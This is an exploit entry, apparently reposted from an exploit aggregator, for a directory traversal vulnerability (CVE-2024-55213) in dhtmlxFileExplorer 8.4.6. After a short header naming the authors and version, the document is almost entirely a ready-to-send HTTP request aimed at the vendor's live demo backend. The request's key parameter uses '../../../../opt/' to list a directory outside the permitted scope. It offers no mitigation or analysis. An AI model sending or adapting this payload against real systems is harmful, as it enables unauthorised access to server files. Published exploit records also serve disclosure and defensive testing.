Exploit for dhtmlxFileExplorer 8.4.6 Directory Traversal CVE-2024-55213

## https://sploitus.com/exploit?id=PACKETSTORM:189020
# Exploit Title: dhtmlxFileExplorer 8.4.6 - Access Sensitive Floder via Directory Traversal in DHX File Exlploer
    # Date: Feb 6, 2025
    # Exploit Author: Nutchaya Augkanavitayakul, Nattachai Wanmak, Pongtorn Angsuchotmetee 
    # Vendor Homepage: https://dhtmlx.com
    # Software Link: https://dhtmlx.com
    # Version: 8.4.6
    # Tested on: macOS
    # CVE : CVE-2024-55213
    
    GET /docs/products/demoApps/dhtmlxFileExplorerDemo/backend/folders?key=ui346173977045/My%20files/Documents/../../../../opt/ HTTP/1.1
    Host: dhtmlx.com
    Sec-Ch-Ua: "Not;A=Brand";v="24", "Chromium";v="128"
    Accept-Language: en-US,en;q=0.9
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
    Sec-Ch-Ua-Platform: "macOS"
    Accept: */*
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://dhtmlx.com/docs/products/demoApps/dhtmlxFileExplorerDemo/
    Accept-Encoding: gzip, deflate, br
    Priority: u=1, i
    Connection: keep-alive